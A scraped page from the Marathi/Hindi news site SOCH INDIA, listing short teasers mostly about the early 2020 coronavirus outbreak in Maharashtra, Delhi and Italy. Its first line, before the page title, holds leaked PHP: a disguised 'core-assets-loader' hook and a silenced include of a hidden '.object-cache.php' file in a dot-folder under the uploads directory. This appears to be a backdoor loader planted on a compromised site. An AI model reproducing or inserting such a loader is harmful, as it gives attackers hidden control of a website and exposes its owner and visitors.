add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); समाचार – SOCH INDIA
Menu

देशभरात सध्या करोना विषाणूच्या प्रादुर्भावामुळे आणीबाणीची परिस्थिती निर्माण झाली आहे. महाराष्ट्रातही राज्य सरकारतर्फे खबरदारीचा उपाय म्हणून उपाययोजना राबवल्या जात आहेत. मुख्यमंत्री उद्धव ठाकरे यांनी ३१ मार्चपर्यंत राज्यातील थेटर्स, मॉल, नाट्यगृह, जिम, स्विमींग पूल बंद ठेवण्याचे आदेश दिले आहेत. याचसोबत लोकांनी गर्दीच्या ठिकाणी जाणं टाळावं यासाठीही सूचना देण्यात आल्या आहेत....

Read More

चीनपासून सुरु झालेल्या कोरोना व्हायरसने संपूर्ण जगभरात हाहाकार माजवला आहे. इटलीमध्येही या व्हायरसने लोकांचं जगणं अतिशय कठीण केलं आहे. मिळालेल्या माहितीनुसार, इटलीमध्ये शुक्रवारी कोरोना व्हायरसमुळे २५० लोकांचा मृत्यू झाला आहे. तर आतापर्यंत १२००हून अधिक लोकांनी या व्हायरसमुळे आपला जीव गमवला आहे. या धोकादायक संसर्गामुळे संपूर्ण इटलीमध्ये भीतीदायक वातावरण आहे....

Read More

देशासह महाराष्ट्रात करोना विषाणूची लागण झालेल्या रुग्णांची संख्या दररोज वाढत आहे. त्या पार्श्वभूमीवर महाराष्ट्र नवनिर्माण सेनेने परिस्थितीचं गांभीर्य लक्षात घेऊन ‘गुढीपाडवा मेळावा’ रद्द करत असल्याचा निर्णय जाहीर केला आहे. महाराष्ट्रात करोना विषाणूची लागण झालेल्या रुग्णांची संख्या १९ वर पोहोचली आहे. करोना साथीच्या आजारामध्ये मोडत असल्याने सरकारने खबरदारी उपाय म्हणून...

Read More

करोनाचा वाढता प्रसार लक्षात घेता पूर्वतयारी म्हणून उपनगरीय रुग्णालयांसह खासगी रुग्णालयांमध्येही विलगीकरण कक्ष पालिकेने तयार केले आहेत. सेव्हन हिल्स रुग्णालयातील सुविधांचा शुक्रवारी पालिका आयुक्तांनी आढावा घेतला असून येथेही लवकरच विलगीकरण कक्ष सुरू केला जाणार असल्याची माहिती शुक्रवारी आयोजित केलेल्या पत्रकार परिषदेत जाहीर केली. कस्तुरबा रुग्णालयात सध्या ७८ खाटा उपलब्ध...

Read More

राज्यात वनीकरणासाठी राबवलेल्या ५० कोटी वृक्षलागवड योजनेत काहीही गैर नाही, हे महाआघाडी सरकारने विधिमंडळातच मान्य केले. त्यामुळे या प्रकरणाची तक्रार करून चौकशीची मागणी करणारे चंद्रपूर जिल्ह्यचे पालकमंत्री विजय वडेट्टीवार तोंडघशी पडले आहेत. या योजनेत कोणताही भ्रष्टाचार झालेला नाही. उलट ही योजना आम्ही पुढे नेणार आहोत, असेही सरकारने जाहीर केले....

Read More

दिल्ली में शुक्रवार को कोरोना वायरस की वजह से महिला की मौत हो गई थी, जिसका निगमबोध घाट पर अंतिम संस्कार करने से मना कर दिया गया. लेकिन जब इस संबंध में ‘आजतक’ पर खबर चली तो बाद में निगमबोध घाट ने कोरोना से जान गंवाने वाली महिला के...

Read More

जगातील अनेक देशांमध्ये करोना विषाणूची लागण झालेल्या रुग्णांची संख्या झपाटयाने वाढत आहे. चीन, दक्षिण कोरियाप्रमाणे युरोपातील इटलीला करोना व्हायरसचा सर्वाधिक फटका बसला आहे. इटलीत करोना व्हायरसची लागण झालेल्या रुग्णांची संख्या काही हजारांच्या घरात असून, मृत्यूचे प्रमाणही इथे जास्त आहे. शुक्रवारी २४ तासात इटलीमध्ये करोना व्हायरसमुळे तब्बल २५० जणांचा मृत्यू...

Read More

राज्यात कोरोना रुग्णांची संख्या वाढत असताना या चिंतेत भर टाकणारी माहिती समोर आली आहे. नागपूरच्या मेयो रुग्णालयातून शनिवारी कोरोनाच्या चार संशयित रुग्णांनी पळ काढला आहे. त्यामुळे आता हे रुग्ण शहरातील इतर लोकांच्या संपर्कात आल्यास मोठा धोका निर्माण होण्याची शक्यता आहे. मात्र, यापैकी तिघांचा माग काढण्यात पोलिसांना यश आले आहे....

Read More

कोरोना वायरस का असर लोगों की दिनचर्या के साथ ही दुनिया की अर्थव्यवस्था पर भी देखा जा रहा है. कोरोना वायरस के कारण दुनियाभर के कारोबार को झटका लगा है. कोरोना के असर के चलते दुनिया में तेल को लेकर प्राइज वॉर भी देखने को मिल रहा है. इस...

Read More

राज्यात काही बँकांचे घोटाळे बाहेर येत आहेत. तसेच राज्य आणि देशातील काही बँका बुडीत निघाल्या आहेत. अनेकांचे पैसे अडकले. त्यामुळ नवा पेच निर्माण झाला आहे. लोकांचा पैसा सुरक्षित राहण्यासाठी राज्य सरकारने पाऊल उचलले आहे. त्यामुळे सार्वजनिक महामंडळांनी राष्ट्रीयकृत बँकेतच पैसे जमा करावेत, असा राज्य सरकारने आदेश जारी केला आहे....

Read More